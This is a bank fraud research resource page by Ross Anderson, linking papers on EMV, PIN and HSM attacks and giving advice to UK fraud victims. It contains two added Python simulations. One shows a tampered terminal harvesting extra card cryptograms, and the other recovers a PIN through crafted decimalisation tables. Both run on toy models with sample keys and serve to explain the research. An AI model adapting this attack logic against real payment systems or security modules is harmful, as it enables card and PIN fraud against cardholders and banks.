The Bank Fraud Resource Page
Ross Anderson
Cards get cloned; online bank accounts get phished; bank staff embezzle money;
banks rip off their customers. Both cardholders and merchants rip off banks.
Bank fraud is a multibillion dollar industry, and getting more complex all the
time. Most of the bad things that happen on the Internet end up with money
vanishing from someone's account.
Colleagues and I have been researching bank fraud for a couple of decades. In
this web page we've pulled together links to a lot of relevant research and
other resources. If you are a banker, a policeman, or a customer, this page is
for you. (If you're a fraudster, you may well know it all already.)
This page provides links to a number of key papers, home pages of active researchers, and other resources. Complementary pages include our security economics resource
page and our security psychology resource
page. There is also an interview I did with
Marc Tobias of security.org.
Key Papers
- Be Prepared: The EMV Pre-play Attack describes attacks based on design and implementation flaws in EMV that have been exploited since 2014 to rob sex-industry customers in the UK, Spain, Poland and elsewhere. The earlier conference version is Chip and
Skim: Cloning EMV Cards with the Pre-Play Attack (blog, preprint, BBC story and blog). You think you're paying £35 for a lap dance but you're actually authorising half a dozen large payments that are submitted one at a time until your account is cleaned out.
- Security
protocols and evidence: where many payment systems fail analyses why
dispute resolution is hard. In a nutshell, the systems needed to support it
properly just don't get built (blog).
- As for contactless payments, Martin Emms and colleagues have a super paper on Risks of Offline Verify PIN on
Contactless Cards which shows how you can program a Blackberry to act as a
fake terminal. Each time you brush against a target's wallet you can guess one
possible PIN for his Barclaycard. Once you get lucky you can clone the card.
- In 2010, we won an award
for a paper
describing the No-PIN attack: a man-in-the-middle attack that allows a stolen card to be
used with any PIN. There was a TV piece on Newsnight
(see also ZDnet,
the Telegraph,
the Mail,
the Mirror,
the Register,
Bruce
Schneier, the press release
and our FAQ)
- The banks eventually reacted with an attempt to censor
our research (see the Guardian,
the Mail,
Radio
4 and Radio
5). There was an apt comment in 1641 by Bishop John
Wilkins.
- A
birthday present every eleven wallets? is the first proper study of the
security of customer-selected bank PINs, and documents the fact that some banks
let their customers choose really weak PINs like 1234; a thief finding a wallet
full of their customers' cards has a one in eleven chance of striking it lucky,
as opposed to one in eighteen for more prudent banks (blog, press, blog).
- Verified by
VISA – the mechanism that asks for your card password when you shop
online – is an example of how a poor design can win out if it has strong
deployment incentives (see also blog
post and slides).
- We have a tech report On
the Security of Internet Banking in South Korea which explores the
consequences of a nationally-mandated authentication system.
- We studied the (lack of) cooperation between bank phishing site takedown
contractors in The Economics of Online
Crime, which appeared in the Journal of Economic Perspectives. Banks
should ask their contractors to share feeds and compete on takedown time.
- The Impact
of Incentives on Notice and Take-down examines how take-down speed varies
with the incentive of the party requesting removal. Banks are quick to remove
phishing websites that mention them by name, but they ignore mule recruitment
websites because it is hard to tell which bank will be affected.
- A major study of Security
Economics and European Policy for the European Commission recommended that
the EC get all countries to publish statistics of bank fraud, as Britain and
France already do.
- Thinking
inside the box: system-level failures of tamper proofing documented serious
vulnerabilities in Chip and PIN payment terminals and won the Best Practical Paper award at
the 2008 Oakland
conference. It was also featured on Newsnight; see the video
and the viewers'
comments. Here are some frequently
asked questions, our press
release, and coverage in the Register,
the Newsnight
blog and the Telegraph.
- Failures
on Fraud appeared in a central bankers' magazine and argued that
all this is yet another symptom of the failure of bank
regulation.
- We did an analysis of the failings of the
Financial Ombudsman Service (see also a video from the World
Economic Forum in November 2008).
- We had a paper at Financial Crypto on possible middleperson attacks on RFID/NFC
payments.
- I did a Google
tech talk on searching for covert communities and villains online.
- The Fed commissioned a paper
on fraud, risk and
nonbank payment systems.
- In the
Man-in-the-Middle Defence, we advocated that the customer be able to put a
trustworthy device between his bank card and a payment terminal, and sketched
how this might be done with EMV.
- We wrote a big survey paper on cryptographic
processors, a shortened version of which appeared in Proc IEEE.
- Why Information
Security is Hard – An Economic Perspective was the paper that got
information security people thinking about economics. It applies microeconomic
analysis to explain many phenomena that security folks had found to be
pervasive but perplexing, from adverse selection in payment systems governance
to the failure of certification and evaluation schemes.
- Optimised to
Fail: Card Readers for Online Banking documents the shortcomings of the
CAP card readers used for online banking; see also our blog, press
coverage and the later journal
version.
- "Why Cryptosystems Fail" may have been cited more than anything else I've
written. This
version appeared at ACM CCS 93 and explains how ATM fraud was done in the
early 1990s; here is the journal version
which appeared the following year in Communications of the ACM.
- Liability and
Computer Security – Nine Principles took this work further, and
examines the problems with relying on cryptographic evidence.
- The introduction of EMV ('chip and PIN') was supposed to fix the
problem, but hasn't: Phish
and Chips documents protocol weaknesses in EMV.
- A Note on
EMV Secure Messaging in the IBM 4758 CCA documents how hardware security
module transactions introduced by VISA to support EMV broke the security
of multiple vendors' HSMs by making their APIs dangerous.
- The
Man-in-the-Middle Defence shows how to turn protocol weaknesses to
advantage.
- On a New Way to
Read Data from Memory describes techniques we developed that use lasers to
read out memory contents directly from a chip, without using the read-out
circuits provided by the vendor. The work builds on methods described in Optical Fault
Induction Attacks, which showed how laser pulses could be used to induce
faults in smartcards that would leak secret information. That paper appeared at
CHES 2002; it made the
front page of the New York
Times and also got covered by Slashdot.
- Our seminal paper on hardware security, Tamper Resistance
– A Cautionary Note, describes how to penetrate the smartcards and
secure microcontrollers of the mid-1990s. It kicked off the modern academic
study of hardware security and won a Best Paper award.
- We followed up with Low Cost Attacks on
Tamper Resistant Devices, which describes a number of further tricks. See
also the home page of our hardware security
laboratory, Markus Kuhn's page of links to hardware
attack resources, and Theo Markettos' thesis.
- The
Memorability and Security of Passwords – Some Empirical
Results tackles an old problem - how do you train users to choose
passwords that are easy to remember but hard to guess? We did a
randomized controlled trial with a few hundred first year science
students which confirmed some folk beliefs, but debunked some others.
This became one of the classic papers on security usability.
- API Level
Attacks on Embedded Systems are a powerful class of attack we discovered on
cryptographic processors, and indeed any systems where more trusted systems
talk to less trusted ones. The idea is that a "secure" device can often be
defeated by sending it some sequence of transactions which its designer did not
expect. We've defeated pretty well every security processor we've looked at, at
least once.
- This line of research originated at Protocols 2000 with my paper The Correctness of
Crypto Transaction Sets; more followed in the first edition of my book.
- Robbing the bank
with a theorem prover shows how to apply advanced tools to the API
security problem.
- Ideas for future API research can be found in Protocol
Analysis, Composability and Computation, while an up-to-date
survey of API attacks can be found in the second edition of my
book.
- NetCard
– A Practical Electronic Cash Scheme presents research on
micropayment protocols for use in electronic commerce.
- The Formal
Verification of a Payment System describes the first use of formal methods
to verify an actual payment protocol, which was (and still is) used in an
electronic purse product (VISA's COPAC card). This is a teaching example I use
to get the ideas of the BAN logic across to undergraduates. There is further
detailed information in a technical
report, which combines papers given at ESORICS 92 and Cardis 94.
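The lap-dance scenario in the Be Prepared and Chip and Skim entries above comes down to one fact: the chip has no display, so it will compute a valid cryptogram for every amount a tampered terminal asks for while the card is in the slot, and the issuer's usual replay check (a strictly increasing transaction counter) cannot tell those cryptograms from ones the cardholder approved. The following toy simulation is added to this page to make that concrete; it is not code from the papers linked here. HMAC-SHA256 stands in for the card's MAC, the record layout, class names and the sample PAN and key are all invented for the example, and only the EMV terms ARQC, ATC and unpredictable number are real:

```python
"""Toy model of the 'harvest several cryptograms from one card presentation'
attack. Added illustration; not code from the papers linked on this page.
Everything here is invented for the example: HMAC-SHA256 stands in for the
card's MAC, the field layout is made up, and the PAN and key are samples."""
import hashlib
import hmac
import secrets


def _mac_input(pan: str, amount_pence: int, atc: int, un: bytes) -> bytes:
    # Constructed record layout; the real chip MACs a longer list of fields.
    return f"{pan}|{amount_pence}|{atc}|".encode() + un


class Card:
    """The chip: a key and a transaction counter (ATC). It signs whatever
    data the terminal presents and has no display, so the cardholder never
    sees which amounts it is asked to authorise."""

    def __init__(self, pan: str, key: bytes):
        self.pan, self._key, self.atc = pan, key, 0

    def generate_ac(self, amount_pence: int, un: bytes) -> dict:
        self.atc += 1
        arqc = hmac.new(self._key, _mac_input(self.pan, amount_pence, self.atc, un),
                        hashlib.sha256).digest()[:8]
        return {"pan": self.pan, "amount": amount_pence, "atc": self.atc,
                "un": un, "arqc": arqc}


class Issuer:
    """The bank host: recomputes the MAC and insists the ATC strictly
    increases, which stops one cryptogram being presented twice."""

    def __init__(self, keys: dict):
        self._keys, self._last_atc = keys, {}

    def authorise(self, tx: dict) -> bool:
        key = self._keys.get(tx["pan"])
        if key is None:
            return False
        expected = hmac.new(key, _mac_input(tx["pan"], tx["amount"], tx["atc"], tx["un"]),
                            hashlib.sha256).digest()[:8]
        if not hmac.compare_digest(expected, tx["arqc"]):
            return False
        if tx["atc"] <= self._last_atc.get(tx["pan"], 0):
            return False  # already-used cryptogram: reject the replay
        self._last_atc[tx["pan"]] = tx["atc"]
        return True


def honest_terminal(card: Card, amount_pence: int) -> dict:
    """One cryptogram, for the amount on the display, with a fresh UN."""
    return card.generate_ac(amount_pence, secrets.token_bytes(4))


def tampered_terminal(card: Card, shown_pence: int, hidden_pence: list) -> list:
    """While the card is in the slot, ask it for one cryptogram per amount.
    Only shown_pence appears on the display; the rest are banked for later."""
    txs = [card.generate_ac(shown_pence, secrets.token_bytes(4))]
    for amount in hidden_pence:
        txs.append(card.generate_ac(amount, secrets.token_bytes(4)))
    return txs


def demo() -> dict:
    key = bytes(range(16))                       # constructed sample key
    card = Card("4000000000000002", key)         # constructed sample PAN
    issuer = Issuer({card.pan: key})
    assert issuer.authorise(honest_terminal(card, 1250))   # a normal £12.50 sale
    harvested = tampered_terminal(card, 3500, [20000, 20000, 25000])
    shown_ok = issuer.authorise(harvested[0])               # the £35 the customer saw
    hidden_ok = [issuer.authorise(tx) for tx in harvested[1:]]  # submitted one at a time, later
    replay_ok = issuer.authorise(harvested[1])              # the same cryptogram twice is caught
    return {"shown_ok": shown_ok, "hidden_ok": hidden_ok, "replay_ok": replay_ok,
            "debited_pence": sum(tx["amount"] for tx in harvested)}


if __name__ == "__main__":
    print(demo())
```

The ATC check does its job against a straight replay, but every harvested cryptogram is a fresh, genuine one, so the issuer accepts all of them and the account is debited £685 for what looked like a £35 sale. That is why the dispute-resolution point in the Security protocols and evidence entry matters: nothing in the authorisation record shows which amount the cardholder actually saw.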
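The API Level Attacks and Robbing the bank with a theorem prover entries above describe defeating a "secure" device by sending it a sequence of transactions its designer did not expect. The canonical worked case is the decimalisation-table attack on IBM 3624-style PIN verification, published by Mike Bond and Piotr Zieliński in 2003: the verify-PIN command lets the caller supply the table that turns the cipher output into decimal digits, and by supplying crafted tables the caller can read the PIN out of the module without ever touching the key. The simulation below is added to this page as an illustration and is not code from the papers linked here. HMAC-SHA256 stands in for the module's DES, the command takes the trial PIN in clear rather than as an encrypted PIN block (an assumed simplification), and the key, PAN and chosen PIN are constructed samples:

```python
"""Toy demonstration of an API-level attack: recovering a customer's PIN from
a security module's verify-PIN command by feeding it decimalisation tables its
designer never expected. Added illustration, not code from the papers on this
page. HMAC-SHA256 stands in for DES, the interface is simplified, and the
key, PAN and PIN are constructed samples."""
import hashlib
import hmac

STANDARD_DECTAB = "0123456789012345"   # hex digit i of the cipher output -> table[i]


def _add_mod10(a: str, b: str) -> str:
    return "".join(str((int(x) + int(y)) % 10) for x, y in zip(a, b))


class ToyHsm:
    """The key never leaves the box; the only operation exposed is verify_pin.
    Simplification: the trial PIN is taken in clear. On a real module it
    arrives as an encrypted PIN block, which the attacker can obtain for a
    chosen PIN from other commands of the same API."""

    def __init__(self, pin_key: bytes):
        self._pin_key = pin_key

    def _natural_pin(self, pan: str, dectab: str) -> str:
        hex4 = hmac.new(self._pin_key, pan.encode(), hashlib.sha256).hexdigest()[:4]
        return "".join(dectab[int(c, 16)] for c in hex4)

    def verify_pin(self, pan: str, trial_pin: str, dectab: str, offset: str) -> bool:
        # Customer PIN = natural PIN + offset, digit-wise mod 10; the offset is
        # not secret (it lives on the card or the host), the key is.
        return hmac.compare_digest(_add_mod10(self._natural_pin(pan, dectab), offset), trial_pin)

    def issue_offset(self, pan: str, chosen_pin: str) -> str:
        """Card issue only: compute the (non-secret) offset for a chosen PIN."""
        natural = self._natural_pin(pan, STANDARD_DECTAB)
        return "".join(str((int(c) - int(n)) % 10) for c, n in zip(chosen_pin, natural))


def crack_pin(hsm: ToyHsm, pan: str, offset: str) -> tuple:
    """Recover the PIN using only verify_pin calls. Returns (pin, calls)."""
    calls = 0
    zero_tab = "0" * 16

    # Phase 1: which hex digits appear in the four hidden cipher digits?
    # With a table mapping everything to 0 except h -> 1, the natural PIN
    # differs from 0000 exactly when h is present.
    present = []
    for h in range(16):
        tab = zero_tab[:h] + "1" + zero_tab[h + 1:]
        calls += 1
        if not hsm.verify_pin(pan, "0000", tab, "0000"):
            present.append(h)

    # Phase 2: at which positions? Under the same table the natural PIN has a 1
    # exactly where the cipher digit is h, so try each pattern of 1s.
    hex_digits = [None] * 4
    for h in present:
        tab = zero_tab[:h] + "1" + zero_tab[h + 1:]
        for mask in range(1, 16):
            trial = "".join("1" if mask >> i & 1 else "0" for i in range(4))
            calls += 1
            if hsm.verify_pin(pan, trial, tab, "0000"):
                for i in range(4):
                    if mask >> i & 1:
                        hex_digits[i] = h
                break

    # Re-run the module's own arithmetic with the real table and real offset.
    natural = "".join(STANDARD_DECTAB[h] for h in hex_digits)
    return _add_mod10(natural, offset), calls


if __name__ == "__main__":
    hsm = ToyHsm(b"\x0f" * 16)              # constructed sample key
    pan = "4000000000000002"                # constructed sample PAN
    offset = hsm.issue_offset(pan, "4927")  # the customer chose 4927
    print(crack_pin(hsm, pan, offset))      # recovers '4927' in at most 76 calls
```

Every call is a legitimate, well-formed transaction; the module is never asked to do anything outside its specification. The failure is that the designer modelled the table as a fixed parameter rather than as attacker-controlled input, which is exactly the kind of assumption a theorem prover run over the API's transaction set can be made to expose.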
Community - Home Pages of People with Relevant Interests
Resources for Victims in the UK
If you are the victim of fraud against your online bank account, your bank
will often tell you that you are liable because of the terms and conditions on
the account. Most banks' contracts state that you are liable for any debits
made using your password, regardless of whether or not you made them (see
survey here).
It's even worse if you are the victim of a fraud against an EMV
(‘chip-and-PIN’) card; banks will routinely claim that as their
system is secure, you must be mistaken or lying. They will suggest that you
complain to the Financial Ombudsman Service; but the ombudsman routinely finds
against cardholders, regardless of the law and the evidence
(see here).
If you complain to the police, they will tell you to report it to the bank
first. This is designed to shrink the fraud statistics. But if the bank refuses
to refund your money, then you are the victim not the bank, and you're entitled
to have the crime recorded under section 53C of
the Home Office
Counting Rules For Recorded Crime April 2008 (see
also here). The police
unit dealing with card fraud is funded largely by the banks, a practice frowned on elsewhere.
The history of victims who've sued banks is not good; in the Alain
Job case,
for example, Alain failed to recover £2000 and was ordered to pay
£15,000 of the bank's costs; in another case I know a complainant
retained a solicitor to recover £10,000, and the solicitor charged her
another £10,000 without making any useful progress, leading her to
abandon the case. On the other hand, where banks have accused customers of
defrauding them, the customer often wins: see
the Badger
case, for example. If you get wrongfully prosecuted over a card transaction, or
if you're thinking of suing to get your money back, best read this submission
to the Treasury select committee. Keep any solicitor on a tight rein:
‘Your budget to get the case to stage X is £Y’. If you're
well-organised and articulate, you might manage to bring
a small claims case in person but for that you'd need to know your facts,
research the law, and be careful not to end up liable for the bank's costs. (The
bank will apply to have your case moved from the small claims track, where each
side pays its own costs, to the fast track, where the loser pays the winner's
costs. If the judge agrees, walk away!) You should also study the
papers in the Eve Russell case to see up close how banks and the ombudsman
work. There is also a very
useful paper on evidence in chip and pin cases which you should read closely
if you're bringing a case yourself, and get your lawyer to read if you hire one.
And if you need emotional support after being scammed, you can always call a
charity like Victim Support.
In short, we have a regulatory failure in Britain. Many more people
suffer frauds such as card cloning, phishing and dodgy online auctions than
suffer traditional acquisitive crimes such as burglary and car theft. However
the police don't want to know and the banks get away with dumping most of the
fraud risk on cardholders and merchants. As a victim, you'll have a hard time
getting your money back unless you can get your story in the press, or you can
threaten to take away enough business from your banker that he cares. Britain
is not honouring its obligation under Chapter 5 of the EU Payment
Services Directive. We need a change in the law.
Other Resources
Here are some suggestions for further reading:
- My book Security
Engineering might be a good introduction. It covers not just technologies
such as crypto and firewalls, but a number of specific applications from
banking to burglar alarms, and relevant attacks from chip tampering to API
manipulation. It also brings out the economic and psychological aspects.
- Bernardo Batiz-Lazo's Emergence and
Evolution of Proprietary ATM Networks in the UK recounts the history of the
ATM.
- The Banking and
Payments Research group at Federal Reserve has produced a number of
relevant papers including overviews of ATM systems, nonbank payment systems and
mobile payments in the USA. Their Chip-and-PIN:
Success and Challenges in Reducing Fraud gives a view of fraud levels in a
number of different countries in 2011, and the effect of EMV introduction. The
U.S. Adoption of Computer-Chip Payment Cards: Implications for Payment
Fraud discusses how the USA might be affected by its forthcoming
introduction there.
- David Evans and Richard Schmalensee's Paying
with Plastic gives the history of credit cards and analyses the industry's
economics.
- Mike Bond's Phantom
Withdrawals page has some useful case histories and links but has not been
maintained since 2009.
- Omar Choudary's MPhil
thesis, which the British banks tried to ban. It set out to
implement the man-in-the-middle defence described above, and also provides a
platform on which to implement and test for the No-PIN attack.
- I've described The
Art of Deception by Kevin Mitnick as "the most disturbing security book
ever". Mitnick was jailed after a hacking spree based mostly on social
engineering: he became a master at telling lies on the telephone that would
cause people to give him passwords or otherwise open systems to attack. This
book tells how he did it.
- Understanding
scam victims: seven principles for systems security by Frank Stajano and
Paul Wilson examines a variety of scams and cons that were documented in the
BBC TV programme "The Real Hustle", extracts the principles on which the scams
were based, and applies them to system security.
- The
Psychology of Scams - Provoking and Committing Errors of Judgment, by
Stephen Lea and colleagues, is an encyclopaedic study of how people fall for
online and other scams, conducted for the UK Office of Fair Trading. The
authors give a thorough literature review, describe a large number of scams,
and then present four original studies of their own. Scams involve many of the
other techniques used by legitimate marketers; people who are poor at
regulating their emotions, and perhaps are socially isolated, may be
disproportionately vulnerable.
- Social
Phishing, by Tom Jagatic and others, reports how the percentage of students
who responded to a test phishing email was increased from 16% to 72% by
including relevant social information about the target (for example by making
the email appear to come from a friend of the target, identified via a social
networking site).
- Electronic
Commerce – Who Carries the Risk of Fraud? discusses how banks used
the move to online banking in the late 1990s to weaken consumer
protection.
- Understanding
Risk Management in Emerging Retail Payments is a research paper from the US
Federal Reserve on how technology is changing the risk landscape there. They
give a number of examples of scams that got closed down by the FTC and other
authorities; examine what can go wrong; and give an economic analysis of the
nature of payment security. It is a public good in that it provides general
benefits, but networks can exclude users, making it a club good instead.
- FIPR made submissions on consumer protection to the House of Lords inquiry
into Personal Internet
Security (with which the House of Lords basically agreed)
and the consultation on the National Payments Plan.
- Using Social
Psychology to Implement Security Policies, by Mich Kabay, discusses how to
get people to pay attention to security policies and the importance of the
social schemata by which people frame reality and judge behaviour. These are
particularly important when the desired behaviour violates social norms such as
holding doors open for people. A number of strategies for changing expectations
and norms are discussed.
- European
Cyber-Gangs Target Small U.S. Firms, Group Says is a Washington Post article
that brought to attention the rising trend towards wire-transfer fraud
being committed against businesses using stolen electronic banking credentials.
(This increasingly involves spear-phishing, or the use of social engineering to
get targets to install malware, as described here.)
- Identification
of Pressed Keys from Mechanical Vibrations by Gerson Faria and Hae-Yong Kim
shows how ATM PINs can be snarfed by measuring the keyboard vibrations as they
are entered.
- Identification
of Pressed Keys by Acoustic Transfer Function, by the same authors, shows
that some PIN pads allow PINs to be simply listened to; the sounds of the keys
are sufficiently different for one widely-used Ingenico PIN pad that remote PIN
stealing is trivial, despite its being Common Criteria certified.
- Finally, here's a piece on ATM skimmers.